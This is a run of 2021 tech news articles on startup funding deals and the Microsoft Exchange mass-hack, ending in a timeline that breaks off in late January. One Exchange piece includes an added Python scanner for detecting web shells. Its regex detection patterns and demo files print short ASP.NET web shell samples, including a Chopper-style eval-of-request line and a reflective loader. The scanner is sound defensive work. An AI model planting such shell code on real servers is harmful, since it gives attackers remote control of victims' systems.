Wefarm adds $11M to expand its network for independent farmers, now at 2.5M users

The vast majority of startups remain focused on consumers, knowledge workers and the opportunities to provide services to those that are already operating completely, or at least partially, in digital environments. But today comes news of funding for a startup building a social network for what is probably one of the least digital business sectors of all: independent, small-hold farmers in the developing world.

Wefarm, a social networking platform aimed at independent farmers to help them meet each other, exchange ideas and get advice, and sell or trade equipment and supplies, has raised $11 million funding to continue expanding its business, which now has 2.5 million users.

To put that number and the growth opportunity into some perspective, Wefarm estimates there are some 400 million small-hold farmers globally, with a large proportion of them in developing markets.

The funding, an extension to the company’s 2019 Series A, is being led by Octopus Ventures. True Ventures (which led the 2019 round), Rabo Frontier Ventures, LocalGlobe, June Fund and AgFunder also participated. Wefarm has raised $32 million since being founded in 2015.

To date, London-based Wefarm has primarily found traction in countries in East Africa. Its service is available via a website, but most of its users access it without any internet use at all, via the company’s SMS interface. The SMS format has now hosted more than 37 million conversations from farmers engaging in around 400 different types of farming (from livestock or dairy to grains and fruits and vegetables) and $29 million in marketplace sales, the company said.

But rolling out SMS services can be slow, in part because it requires Wefarm to strike local deals with carriers over data usage. (That has also meant that the company has tightly controlled growth: if you go to the main site, you’ll see that you can either join a waitlist or join by way of an invitation from an existing member.)

Kenny Ewan, Wefarm’s founder and CEO, said this latest tranche of funding in part will be used to roll out an app (currently in beta) that will help it launch in more countries and pick up more farmers.

“The big step we’re taking is going from SMS to a digital, app-based service, which will remove the digital barrier,” he said in an interview. “We compare it to the shift from sending DVDs in the mail to streaming video online. We feel like the time is right and believe it could take us to the 100 million mark of users.”

From pandemics to locust plagues

Wefarm’s role in helping link up independent farmers — traditionally and by its nature one of the most analog of industries — has taken on an interesting profile particularly in the last year.

The COVID-19 pandemic has thrown a stark light on a number of digital divides in the world, and one of the most distinctive has been in the wider world of business. Entrepreneurs, companies and organizations that had digital strategies in place could hit the ground running to adapt to a “new normal,” with less physical interaction. Those that did not had to scramble to get there to avoid a nosedive in activity.

Wefarm was around for years before the COVID-19 pandemic, and in some regards it has always been championing and giving a digital voice to the underdogs.

The wider agricultural industry — globally a multi-trillion-dollar enterprise, accounting for up to 25% of GDP in some markets — has undergone some significant digital transformation, but that has been focused on tools and other technology for the agribusiness sector, which includes the giant conglomerates and multinationals like Cargill, Archer-Daniels-Midland, Bayer (Monsanto’s parent), John Deere and others.

Wefarm’s importance (and often singular presence) as a tool for independent farmers to communicate, trade and generally network with others like them was already playing out before COVID-19. When we covered the company’s previous raise in 2019 (the first part of its Series A, a $13 million round) it had already grown to 1.9 million members. And, as it happens, for many of its users, COVID-19 was in some regards the least of their concerns:

“In reality a lot of people in rural Africa were concerned about the weather, or the effect of a locust plague,” Ewan said. “What we saw was traffic around not COVID, but these topics. They had different preoccupations.”

But the pandemic has had an impact, nevertheless. On the platform itself, as we saw in other e-commerce scenarios, Wefarm emerged as an essential service for trading at a time when in-person meetings were halted. As for Wefarm as a business, Ewan said that it essentially meant that the company’s country expansion plans had completely halted mainly because business development teams could no longer travel as they had before: another reason why launching an app could be a useful growth tool.

(That lack of travel was also, in one sense, potentially helpful to Wefarm: despite it, the company still managed to grow by 600,000 more users, Ewan pointed out, underscoring a clear demand for the service among its target audience.)

Going forward, there are other ways in which Wefarm aims to leverage its user base, its network and the data that it potentially can amass from them.

“We see the possibility of providing more analytics and data. Our users want that very much,” Ewan said. “We now know more about small-scale farmers than anyone else, because they talk to us.” Areas that Wefarm is considering developing over the next two years include whether it can help provide more insight into workable business models, pricing models and more data on particular aspects such as ripening periods.

“By building a highly engaged community of millions of small-holder farmers, Wefarm has created a powerful platform providing greater access to vital knowledge and information, which allows farmers to unlock greater economic potential from their land,” said Kamran Adle, early-stage investor at Octopus Ventures. “In practice that might mean understanding which fertilisers work best, what the market price is for certain goods, or new farming techniques that result in better yields, all of which can make a significant difference to livelihoods. It’s also an enormous market with more than 400 million small-holder farmers globally who collectively spend around $400 billion on farming inputs. There is a huge opportunity for Kenny and the team at Wefarm to achieve incredible scale and we’re excited for the launch of its digital platform which will further accelerate growth.”

Dropbox to acquire secure document sharing startup DocSend for $165M

Dropbox announced today that it plans to acquire DocSend for $165 million. The company helps customers share and track documents by sending a secure link instead of an attachment.

“We’re announcing that we’re acquiring DocSend to help us deliver an even broader set of tools for remote work, and DocSend helps customers securely manage and share their business-critical documents, backed by powerful engagement analytics,” Dropbox CEO Drew Houston told me.

When combined with the electronic signature capability of HelloSign, which Dropbox acquired in 2019, the acquisition gives the company an end-to-end document-sharing workflow it had been missing. “Dropbox, DocSend and HelloSign will be able to offer a full suite of self-serve products to help our millions of customers manage the entire critical document workflows and give more control over all aspects of that,” Houston explained.

Houston and DocSend co-founder and CEO Russ Heddleston have known each other for years and have an established relationship. In fact, Heddleston worked for Dropbox as a summer intern in 2010. He even ran the idea for the company by Houston prior to launching in 2013, who gave it his seal of approval, and the two companies have been partners for some time.

“We’ve just been following the thread of external sending, which has just kind of evolved and opened up into all these different workflows. And it’s just really interesting that by just being laser-focused on that we’ve been able to create a really differentiated product that users love a ton,” Heddleston said.

Those workflows include creative, sales, client services or startups using DocSend to deliver proposals or pitch decks and track engagement. In fact, among the earliest use cases for the company was helping startups track engagement with their pitch decks at VC firms.

The company raised a modest amount of money along the way, just $15.3 million, according to Crunchbase, but Heddleston says that he wanted to build a company that was self-sufficient and raising more VC dollars was never a priority or necessity. “We had [VCs] chase us to give us more money all the time, and what we would tell our employees is that we don’t keep count based on money raised or headcount. It’s just about building a great company,” he said.

That builder’s attitude was one of the things that attracted Houston to the company. “We’re big believers in the model of product growth and capital efficiency, and building really intuitive products that are viral, and that’s a lot of what attracted us to DocSend,” Houston said. While DocSend has 17,000 customers, Houston says the acquisition gives the company the opportunity to get in front of a much larger customer base as part of Dropbox.

It’s worth noting that Box offers a similar secure document-sharing capability enabling users to share a link instead of using an attachment. It recently bought e-signature startup SignRequest for $55 million with an eye toward building more complex document workflows similar to what Dropbox now has with HelloSign and DocSend. PandaDoc is another competitor in this space.

Both Dropbox and DocSend participated in the TechCrunch Disrupt Battlefield, with Houston debuting Dropbox in 2008 at the TechCrunch 50, the original name of the event. Meanwhile, DocSend participated in 2014 at TechCrunch Disrupt in New York City.

DocSend’s approximately 50 employees will be joining Dropbox when the deal closes, which should happen soon, subject to standard regulatory oversight.

Entertainment payroll startup Wrapbook raises $27M round led by a16z

Wrapbook, a startup that simplifies the payroll process for TV, film and commercial productions, has raised $27 million in Series A funding from noteworthy names in both the tech and entertainment worlds.

The round was led by Andreessen Horowitz, with participation from Equal Ventures and Uncork Capital, as well as from WndrCo (the investment and holding company led by DreamWorks and Quibi founder/co-founder Jeffrey Katzenberg) and from CAA co-founder Michael Ovitz.

“It’s time we bring production financial services into the 21st century,” Katzenberg said in a statement. “We need a technology solution that will address the increasing complexities of production onboarding, pay and insuring cast and crew, only exacerbated by COVID-19, and I believe that Wrapbook delivers.”

Wrapbook co-founder and CEO Ali Javid explained that entertainment payroll has remained a largely old-fashioned, paper-based process, which can be particularly difficult to track as cast and crew move from project to project, up to 30 times in a single year. Wrapbook digitizes and simplifies the process — electronically collecting all the forms and signatures needed at the beginning of production, handling payroll itself, creating a dashboard to track payments and also making it easy to obtain the necessary insurance.

Wrapbook founders Cameron Woodward, Ali Javid, Hesham El-Nahhas and Naysawn Naji

Although the startup was founded in 2018, Javid told me that demand has increased dramatically as production resumed during the pandemic, with COVID-19 “totally” changing the industry’s culture and prompting production companies to say, “Hey, if there’s an easier, faster way to do this from my house, then yeah let’s look at it.”

Javid also described the Wrapbook platform as “a vertical fintech solution that’s growing really fast in an industry that we understand really well and not many others have thought about.” In fact, he said the company’s revenue grew 7x in 2020.

And while Wrapbook’s direct customers are the production companies, co-founder and CMO Cameron Woodward (who previously worked in filmmaking insurance and commercial production) said that the team has also focused on creating a good experience for the cast and crew who get paid through the platform — a growing number of them (12% thus far) have used their Wrapbook profiles to get paid on multiple productions.

Wrapbook growth chart (Image Credits: Wrapbook)

The startup previously raised $3.6 million in seed funding. Looking ahead, Javid and Woodward said that Wrapbook’s solution could eventually be adopted in other project-based industries. But for now, they see plenty of opportunity to continue growing within entertainment alone — they estimated that the industry currently sees $200 billion in annual payments.

“We’re going to double down on what’s working and build things out based on what customers have asked for within entertainment,” Javid said. “To that end, we’re working towards hiring 100 people in the next 12 months.”

Aqua Security raises $135M at a $1B valuation for its cloud native security service

Aqua Security, a Boston- and Tel Aviv-based security startup that focuses squarely on securing cloud-native services, today announced that it has raised a $135 million Series E funding round at a $1 billion valuation. The round was led by ION Crossover Partners. Existing investors M12 Ventures, Lightspeed Venture Partners, Insight Partners, TLV Partners, Greenspring Associates and Acrew Capital also participated. In total, Aqua Security has now raised $265 million since it was founded in 2015.

The company was one of the earliest to focus on securing container deployments. And while many of its competitors were acquired over the years, Aqua remains independent and is now likely on a path to an IPO. When it launched, the industry focus was still very much on Docker and Docker containers. To the detriment of Docker, that quickly shifted to Kubernetes, which is now the de facto standard. But enterprises are also now looking at serverless and other new technologies on top of this new stack.

“Enterprises that five years ago were experimenting with different types of technologies are now facing a completely different technology stack, a completely different ecosystem and a completely new set of security requirements,” Aqua CEO Dror Davidoff told me. And with these new security requirements came a plethora of startups, all focusing on specific parts of the stack.

Image Credits: Aqua Security

What set Aqua apart, Davidoff argues, is that it managed to 1) become the best solution for container security and 2) realize that to succeed in the long run, it had to become a platform that would secure the entire cloud-native environment. About two years ago, the company made this switch from a product to a platform, as Davidoff describes it.

“There was a spree of acquisitions by CheckPoint and Palo Alto [Networks] and Trend [Micro],” Davidoff said. “They all started to acquire pieces and tried to build a more complete offering. The big advantage for Aqua was that we had everything natively built on one platform. […] Five years later, everyone is talking about cloud-native security. No one says ‘container security’ or ‘serverless security’ anymore. And Aqua is practically the broadest cloud-native security [platform].”

One interesting aspect of Aqua’s strategy is that it continues to bet on open source, too. Trivy, its open-source vulnerability scanner, is the default scanner for GitLab’s Harbor Registry and the CNCF’s Artifact Hub, for example.

“We are probably the best security open-source player there is because not only do we secure from vulnerable open source, we are also very active in the open-source community,” Davidoff said (with maybe a bit of hyperbole). “We provide tools to the community that are open source. To keep evolving, we have a whole open-source team. It’s part of the philosophy here that we want to be part of the community and it really helps us to understand it better and provide the right tools.”

In 2020, Aqua, which mostly focuses on mid-size and larger companies, doubled the number of paying customers and it now has more than half a dozen customers with an ARR of over $1 million each.

Davidoff tells me the company wasn’t actively looking for new funding. Its last funding round came together only a year ago, after all. But the team decided that it wanted to be able to double down on its current strategy and raise sooner than originally planned. ION had been interested in working with Aqua for a while, Davidoff told me, and while the company received other offers, the team decided to go ahead with ION as the lead investor (with all of Aqua’s existing investors also participating in this round).

“We want to grow from a product perspective, we want to grow from a go-to-market [perspective] and expand our geographical coverage — and we also want to be a little more acquisitive. That’s another direction we’re looking at because now we have the platform that allows us to do that. […] I feel we can take the company to great heights. That’s the plan. The market opportunity allows us to dream big.”

 

Warning the World of a Ticking Time Bomb

Globally, hundreds of thousands of organizations running Exchange email servers from Microsoft just got mass-hacked, including at least 30,000 victims in the United States. Each hacked server has been retrofitted with a “web shell” backdoor that gives the bad guys total, remote control, the ability to read all email, and easy access to the victim’s other computers. Researchers are now racing to identify, alert and help victims, and hopefully prevent further mayhem.

On Mar. 5, KrebsOnSecurity broke the news that at least 30,000 organizations and hundreds of thousands globally had been hacked. The same sources who shared those figures say the victim list has grown considerably since then, with many victims compromised by multiple cybercrime groups.

Security experts are now trying to alert and assist these victims before malicious hackers launch what many refer to with a mix of dread and anticipation as “Stage 2,” when the bad guys revisit all these hacked servers and seed them with ransomware or else additional hacking tools for crawling even deeper into victim networks.

But that rescue effort has been stymied by the sheer volume of attacks on these Exchange vulnerabilities, and by the number of apparently distinct hacking groups that are vying for control over vulnerable systems.

A security expert who has briefed federal and military advisors on the threat says many victims appear to have more than one type of backdoor installed. Some victims had three of these web shells installed. One was pelted with eight distinct backdoors. This initially caused a major overcount of potential victims, and required a great deal of de-duping various victim lists.

The source, who spoke on condition of anonymity, said many in the cybersecurity community recently saw a large spike in attacks on thousands of Exchange servers that was later linked to a profit-motivated cybercriminal group.

“What we thought was Stage 2 actually was one criminal group hijacking like 10,000 exchange servers,” said one source who’s briefed U.S. national security advisors on the outbreak.

On Mar. 2, when Microsoft released updates to plug the four Exchange flaws being attacked, it attributed the hacking activity to a previously unidentified Chinese cyber espionage group it called “Hafnium.” Microsoft said Hafnium had been using the Exchange flaws to conduct a series of low-and-slow attacks against specific strategic targets, such as non-governmental organizations (NGOs) and think tanks.

But by Feb. 26, that relatively stealthy activity was morphing into the indiscriminate mass-exploitation of all vulnerable Exchange servers. That means even Exchange users that patched the same day Microsoft released security updates may have had servers seeded with backdoors.

Many experts who spoke to KrebsOnSecurity said they believe different cybercriminal groups somehow learned of Microsoft’s plans to ship fixes for the Exchange flaws a week earlier than they’d hoped (Microsoft originally targeted today, Patch Tuesday, as the release date).

The vulnerability scanning activity also ramped up markedly after Microsoft released its updates on Mar. 2. Security researchers love to tear apart patches for clues about the underlying security holes, and one major concern is that various cybercriminal groups may have already worked out how to exploit the flaws independently.

AVERTING MASS-RANSOMWARE

Security experts now are desperately trying to reach tens of thousands of victim organizations with a single message: Whether you have patched yet or have been hacked, back up any data stored on those servers immediately.

Every source I’ve spoken with about this incident says they fully expect profit-motivated cybercriminals to pounce on victims by mass-deploying ransomware. Given that so many groups now have backdoor web shells installed, it would be trivial to unleash ransomware on the lot of them in one go. Also, compromised Exchange servers can be a virtual doorway into the rest of the victim’s network.

“With the number of different threat actors dropping [web] shells on servers increasing, ransomware is inevitable,” said Allison Nixon, chief research officer at Unit221B, a New York City-based cyber investigations firm.

So far there are no signs of victims of this mass-hack being ransomed. But that may well change if the exploit code used to break into these vulnerable Exchange servers goes public. And nobody I’ve interviewed seems to think working exploit code is going to stay unpublished for much longer.

When that happens, the exploits will get folded into publicly available exploit testing kits, effectively making it simple for any attacker to find and compromise a decent number of victims who haven’t already patched.

CHECK MY OWA

Nixon is part of a group of security industry leaders who are contributing data and time to a new victim notification platform online called Check My OWA (Outlook Web Access, the Internet-facing Web component of Exchange Server machines).

Checkmyowa.unit221b.com checks if your Exchange Server domain showed up in attack logs or lists of known-compromised domains.

Perhaps it’s better to call it a self-notification service that is operated from Unit221B’s own web site. Enter an email address at Check My OWA, and if that address matches a domain name for a victim organization, that email address will get a notice.

“Our goal is to motivate people who we might otherwise have never been able to contact,” Nixon said. “My hope is if this site can get out there, then there’s a chance some victim companies are notified and take action or can get att

If the email’s domain name (anything to the right of the @ sign) is detected in their database, the site will send that user an email stating that it has observed the email domain in a list of targeted domains.

“Malicious actors were able to successfully compromise, and some of this information suggested they may have been able to install a webshell on an Exchange server associated with this domain,” reads one of the messages to victims. “We strongly recommend saving an offline backup of your Exchange server’s emails immediately, and refer back to the site for additional information on patching and remediation.”

“We have observed your e-mail domain appears in our list of domains the malicious actors were able to successfully compromise, and some of this information suggested they may have been able to install a webshell on an Exchange server associated with this domain,” is another message the site may return.
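Two of the steps described above, the de-duplication of victim lists that overcounted servers carrying several web shells, and the domain-level match that Check My OWA performs on a submitted e-mail address, are modelled in the following Python. This is an added example written for this page, not Unit221B’s code; the feed names, hostnames (all under the reserved `.test` TLD) and shell paths are constructed sample data, and the rule that an organisation’s domain is the last two labels of a hostname is a simplifying assumption (a production service would consult the Public Suffix List).

```python
"""De-duplicate victim feeds and match a submitted e-mail's domain against them.

Added example, not Check My OWA's own code. All hosts, feeds and shell paths
are constructed sample data.
"""
from collections import defaultdict

# Constructed sample: two feeds, each a list of (hostname, web shell path) hits.
# One server appears once per shell found on it, and appears in both feeds,
# which is exactly the overcount the article describes.
SAMPLE_FEEDS = {
    "honeypot-feed-a": [
        ("mail.example-victim.test", "/owa/auth/a.aspx"),
        ("mail.example-victim.test", "/owa/auth/b.aspx"),
        ("Mail.Example-Victim.test", "/aspnet_client/c.aspx"),
        ("exchange.another-org.test", "/owa/auth/x.aspx"),
    ],
    "scanner-feed-b": [
        ("exchange.another-org.test", "/owa/auth/x.aspx"),
        ("owa.third-party.test ", "/owa/auth/y.aspx"),
    ],
}


def normalize_host(host: str) -> str:
    """Lower-case and strip whitespace and a trailing dot so duplicates collapse."""
    return host.strip().rstrip(".").lower()


def raw_entry_count(feeds) -> int:
    """Number of raw hits across all feeds (the figure that overcounts victims)."""
    return sum(len(entries) for entries in feeds.values())


def merge_victim_lists(feeds):
    """Return {normalised host: set of shell paths}, merged across feeds."""
    merged = defaultdict(set)
    for entries in feeds.values():
        for host, shell in entries:
            merged[normalize_host(host)].add(shell)
    return dict(merged)


def registrable_domains(merged):
    """Reduce compromised hosts to organisation domains used for matching.

    Assumption: the organisation domain is the last two labels of the host.
    """
    domains = set()
    for host in merged:
        labels = host.split(".")
        domains.add(".".join(labels[-2:]) if len(labels) >= 2 else host)
    return domains


def domain_of(email: str):
    """Everything to the right of the @ sign, normalised; None if malformed."""
    if email.count("@") != 1:
        return None
    local, _, domain = email.partition("@")
    domain = normalize_host(domain)
    if not local or not domain or "." not in domain:
        return None
    return domain


def lookup(email: str, domains) -> str:
    """Classify a submitted address: 'invalid', 'compromised' or 'not-listed'.

    Walks up the label hierarchy so that a user at mail.example-victim.test
    is matched when example-victim.test is on the list.
    """
    domain = domain_of(email)
    if domain is None:
        return "invalid"
    labels = domain.split(".")
    for i in range(len(labels) - 1):
        if ".".join(labels[i:]) in domains:
            return "compromised"
    return "not-listed"


if __name__ == "__main__":
    merged = merge_victim_lists(SAMPLE_FEEDS)
    print(f"raw entries: {raw_entry_count(SAMPLE_FEEDS)}, distinct hosts: {len(merged)}")
    listed = registrable_domains(merged)
    for addr in ("Admin@Mail.Example-Victim.test", "user@safe-org.test", "not-an-email"):
        print(addr, "->", lookup(addr, listed))
```

The distinct-host count, not the raw entry count, is the number worth reporting, and the parent-domain walk in `lookup` is what lets a notification reach an address at a mail subdomain when only the organisation domain was recorded.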

Nixon said Exchange users can save themselves a potentially nightmarish scenario if they just back up any affected systems now. And given the number of adversaries currently attacking still-unpatched Exchange systems, there is almost no way this won’t end in disaster for at least some victims.

“There are researchers running honeypots to [attract] attacks from different groups, and those honeypots are getting shelled left and right,” she said. “The sooner they can run a backup, the better. This can help save a lot of heartache.”

Oh, and one more important thing: You’ll want to keep any backups disconnected from everything. Ransomware has a tendency to infect everything it can, so make sure at least one backup is stored completely offline.

“Just disconnect them from a computer, put them in a safe place and pray you don’t need them,” Nixon said.

Microsoft Patch Tuesday, March 2021 Edition

On the off chance you were looking for more security to-dos from Microsoft today…the company released software updates to plug more than 82 security flaws in Windows and other supported software. Ten of these earned Microsoft’s “critical” rating, meaning they can be exploited by malware or miscreants with little or no help from users.

Top of the heap this month (apart from the ongoing, global Exchange Server mass-compromise) is a patch for an Internet Explorer bug that is seeing active exploitation. The IE weakness — CVE-2021-26411 — affects both IE11 and newer EdgeHTML-based versions, and it allows attackers to run a file of their choice by getting you to view a hacked or malicious website in IE.

The IE flaw is tied to a vulnerability that was publicly disclosed in early February by researchers at ENKI who claim it was one of those used in a recent campaign by nation-state actors to target security researchers. In the ENKI blog post, the researchers said they will publish proof-of-concept (PoC) details after the bug has been patched.

“As we’ve seen in the past, once PoC details become publicly available, attackers quickly incorporate those PoCs into their attack toolkits,” said Satnam Narang, staff research engineer at Tenable. “We strongly encourage all organizations that rely on Internet Explorer and Microsoft Edge (EdgeHTML-Based) to apply these patches as soon as possible.”

This is probably a good place to quote Ghacks.net’s Martin Brinkman: This is the last patch hurrah for the legacy Microsoft Edge web browser, which is being retired by Microsoft.

For the second month in a row, Microsoft has patched scary flaws in the DNS servers on Windows Server 2008 through 2019 versions that could be used to remotely install software of the attacker’s choice. All five of the DNS bugs quashed in today’s patch batch earned a CVSS Score (danger metric) of 9.8 — almost as bad as it gets.

“There is the outside chance this could be wormable between DNS servers,” warned Trend Micro’s Dustin Childs.

As mentioned above, hundreds of thousands of organizations are in the midst of dealing with a security nightmare after having their Exchange Server and Outlook Web Access (OWA) hacked and retrofitted with a backdoor. If an organization you know has been affected by this attack, please have them check with the new victim notification website mentioned in today’s story.

Susan Bradley over at Askwoody.com says “nothing in the March security updates (besides the Exchange ones released last week) is causing me to want to urge you to go running to your machines and patch at this time.” I’d concur, unless of course you cruise the web with older Microsoft browsers.

It’s a good idea for Windows users to get in the habit of updating at least once a month, but for regular users (read: not enterprises) it’s usually safe to wait a few days until after the patches are released, so that Microsoft has time to iron out any kinks in the new armor.

But before you update, please make sure you have backed up your system and/or important files. It’s not uncommon for a Windows update package to hose one’s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.

So do yourself a favor and back up before installing any patches. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.

And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see this guide.

As always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.

Additional reading:

Martin Brinkman’s always comprehensive take.

The SANS Internet Storm Center no-frills breakdown of the fixes.

 

McAfee sells enterprise biz to Symphony Technology Group for $4B

Security firm McAfee announced this morning that it will be selling its enterprise business to a consortium led by the private equity firm Symphony Technology Group for $4 billion.

It should pair well with RSA, another enterprise-focused security company the private equity firm purchased last February for $2 billion.

McAfee President and Chief Executive Officer Peter Leav says that his company has decided to direct the firm’s resources to the consumer side of the business. “This transaction will allow McAfee to singularly focus on our consumer business and to accelerate our strategy to be a leader in personal security for consumers,” he said in a statement.

The company has been making some moves in the last year, returning to the public markets after a decade as a private company. In January, the company reportedly laid off a couple of hundred employees and shut down its software development center in Tel Aviv.

Although Symphony did not point directly to the RSA acquisition, the two investments create a large combined legacy security business for the firm, both of which have strong brand recognition, but might have lost some of their edge to more modern competitors in the marketplace.

Looking at McAfee’s latest earnings report, for Q4 2020, which the company reported on February 24, 2021, the consumer business grew at a much brisker rate than the enterprise side of the house. The former was up 23% YoY, while the latter grew at a far slower 5% rate.

As for the entire year, the company reported $2.9 billion in total FY2020 revenue, up 10% YoY. That broke down to $1.6 billion in consumer net revenue up 20% YoY, and $1.3 billion in enterprise net revenue, an increase of just 1% for the full year.

The company has a complex history, starting life in the 1980s selling firewall software. It eventually went public before being purchased by Intel for $7.7 billion in 2010 and going private again. In 2014, the company changed names to Intel Security before Intel sold a majority stake to TPG in 2017 for $4.2 billion and changed the name back to McAfee.

The transaction is expected to close by the end of this year, subject to regulatory oversight.



A Basic Timeline of the Exchange Mass-Hack

Sometimes when a complex story takes us by surprise or knocks us back on our heels, it pays to revisit the events in a somewhat linear fashion. Here’s a brief timeline of what we know leading up to last week’s mass-hack, when hundreds of thousands of Microsoft Exchange Server systems got compromised and seeded with a powerful backdoor Trojan horse program.

When did Microsoft find out about attacks on previously unknown vulnerabilities in Exchange?

Pressed for a date when it first became aware of the problem, Microsoft told KrebsOnSecurity it was initially notified “in early January.” So far the earliest known report came on Jan. 5, from a principal security researcher for security testing firm DEVCORE who goes by the handle “Orange Tsai.” DEVCORE is credited with reporting two of the four Exchange flaws that Microsoft patched on Mar. 2.

Reston, Va.-based Volexity first identified attacks on the flaws on Jan. 6, and officially informed Microsoft about it on Feb. 2. Volexity now says it can see attack traffic going back to Jan. 3. Microsoft credits Volexity with reporting the same two Exchange flaws as DEVCORE.

Danish security firm Dubex says it first saw clients hit on Jan. 18, and reported their incident response findings to Microsoft on Jan. 27.

In a blog post on their discovery, Please Leave an Exploit After the Beep, Dubex said the victims it investigated in January had a “web shell” backdoor installed via the “unified messaging” module, a component of Exchange that allows an organization to store voicemail and faxes along with emails, calendars, and contacts in users’ mailboxes.

“A unified messaging server also allows users access to voicemail features via smartphones, Microsoft Outlook and Outlook Web App,” Dubex wrote. “Most users and IT departments manage their voicemail separately from their email, and voicemail and email exist as separate inboxes hosted on separate servers. Unified Messaging offers an integrated store for all messages and access to content through the computer and the telephone.”

Dubex says Microsoft “escalated” their issue on Feb. 8, but never confirmed the zero-day with Dubex prior to the emergency patch plea on Mar. 2. “We never got a ‘real’ confirmation of the zero-day before the patch was released,” said Dubex’s Chief Technology Officer Jacob Herbst.
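The web shell Dubex describes is the artifact a defender can hunt for directly: a small ASP.NET page dropped into a directory IIS already serves, whose only job is to execute whatever the attacker sends in a request (the “Chopper” one-liner style that the timeline below mentions Trend Micro seeing in January). The scanner that follows is an added example written for this page; it is not code from Dubex, Microsoft or KrebsOnSecurity. It walks a directory tree, flags .aspx/.ashx/.asmx files containing eval-of-request, reflective assembly loading or cmd.exe-spawning code, and records each hit’s modification time so it can be placed against the dates above. The directories in DEFAULT_ROOTS are the Exchange front-end drop locations commonly cited in public Hafnium guidance, listed from memory and to be confirmed against the current advisory; the sample files it scans when given no arguments are constructed for the demo, not real captures.

```python
"""Hunt for dropped ASP.NET web shells under an Exchange front end.
Added example for this page, not code from Dubex, Microsoft or KrebsOnSecurity."""
import os
import re
import sys
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Front-end paths commonly cited in public Hafnium guidance as drop locations.
# Listed from memory; confirm against the current Microsoft advisory before relying on them.
DEFAULT_ROOTS = [
    r"%SystemDrive%\inetpub\wwwroot\aspnet_client",
    r"%ProgramFiles%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth",
    r"%ProgramFiles%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth",
]

# Extensions IIS hands to the ASP.NET pipeline; a dropped shell needs one of these to execute.
SHELL_EXTENSIONS = {".aspx", ".ashx", ".asmx"}

# Server-side code shapes that shipped Exchange pages do not contain.
SHELL_PATTERNS = {
    # China Chopper style: eval(Request.Item["pw"], "unsafe")
    "eval_of_request": re.compile(r"eval\s*\(\s*Request\b", re.I),
    # In-memory loader: Assembly.Load(Convert.FromBase64String(Request[...]))
    "reflective_load": re.compile(
        r"Assembly\.Load\s*\(\s*Convert\.FromBase64String\s*\(\s*Request", re.I),
    # Direct command execution through cmd.exe
    "spawns_cmd": re.compile(
        r'(?:ProcessStartInfo|Process\.Start)\s*\(\s*@?"cmd(?:\.exe)?"', re.I),
}


def scan_text(text: str) -> list:
    """Return the names of every shell pattern present in one file's contents."""
    return [name for name, rx in SHELL_PATTERNS.items() if rx.search(text)]


def scan_tree(root: Path) -> list:
    """Walk root and report ASP.NET files matching any shell pattern, with their mtime."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            if path.suffix.lower() not in SHELL_EXTENSIONS:
                continue
            try:
                text = path.read_text(encoding="utf-8", errors="replace")
            except OSError:
                continue  # unreadable file: record it separately in a real triage
            hits = scan_text(text)
            if hits:
                mtime = datetime.fromtimestamp(path.stat().st_mtime, tz=timezone.utc)
                findings.append({
                    "path": path.relative_to(root).as_posix(),
                    "modified_utc": mtime.isoformat(timespec="seconds"),
                    "indicators": hits,
                })
    return sorted(findings, key=lambda f: f["path"])


# Constructed demo files, not real captures: one ordinary page and two shells.
SAMPLE_FILES = {
    "owa/auth/logon.aspx":
        '<%@ Page Language="C#" %>\n'
        '<% string user = Request.QueryString["username"]; %>\n'
        "<html><body>Sign in</body></html>\n",
    "aspnet_client/system_web/zz.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
    "ecp/auth/loader.aspx":
        '<%@ Page Language="C#" %><script runat="server">\n'
        "void Page_Load(object s, EventArgs e) {\n"
        '  var asm = System.Reflection.Assembly.Load(Convert.FromBase64String(Request["c"]));\n'
        "  asm.EntryPoint.Invoke(null, null);\n"
        "}</script>",
}


def build_demo_tree(base: Path) -> Path:
    """Write SAMPLE_FILES under base and return base."""
    for rel, content in SAMPLE_FILES.items():
        target = base / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return base


def demo_scan() -> list:
    """Build the constructed tree in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory(prefix="exchange-demo-") as tmp:
        return scan_tree(build_demo_tree(Path(tmp)))


def main(argv: list) -> None:
    roots = [Path(os.path.expandvars(a)) for a in argv[1:]]
    if not roots:  # fall back to the known drop locations, then to the demo tree
        roots = [p for p in map(lambda r: Path(os.path.expandvars(r)), DEFAULT_ROOTS) if p.is_dir()]
    results = [(r, scan_tree(r)) for r in roots] if roots else [(Path("demo"), demo_scan())]
    for root, findings in results:
        for f in findings:
            print(f"{f['modified_utc']}  {root / f['path']}  {','.join(f['indicators'])}")


if __name__ == "__main__":
    main(sys.argv)
```

Run it with one or more directories (environment variables such as %ProgramFiles% are expanded) or with no arguments on an Exchange host to sweep the default drop locations; off the host it scans the constructed tree. Treat a hit as a lead, not a verdict: confirm by comparing the file against a clean install and by checking IIS logs for requests to it, and remember that a shell dropped before the Mar. 2 patch survives patching.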

How long have the vulnerabilities exploited here been around?

On Mar. 2, Microsoft patched four flaws in Exchange Server 2013 through 2019. Exchange Server 2010 is no longer supported, but the software giant made a “defense in depth” exception and gave Server 2010 users a freebie patch, too. That means the vulnerabilities the attackers exploited have been in the Microsoft Exchange Server code base for more than ten years.

The timeline also means Microsoft had almost two months to push out the patch it ultimately shipped Mar. 2, or at least to help hundreds of thousands of Exchange customers mitigate the threat from these flaws, before attackers started exploiting them indiscriminately.

Here’s a rough timeline as we know it so far:

  • Jan. 5: DEVCORE alerts Microsoft of its findings.
  • Jan. 6: Volexity spots attacks that use unknown vulnerabilities in Exchange.
  • Jan. 8: DEVCORE reports Microsoft had reproduced the problems and verified their findings.
  • Jan. 11: DEVCORE snags proxylogon.com, a domain now used to explain its vulnerability discovery process.
  • Jan. 27: Dubex alerts Microsoft about attacks on a new Exchange flaw.
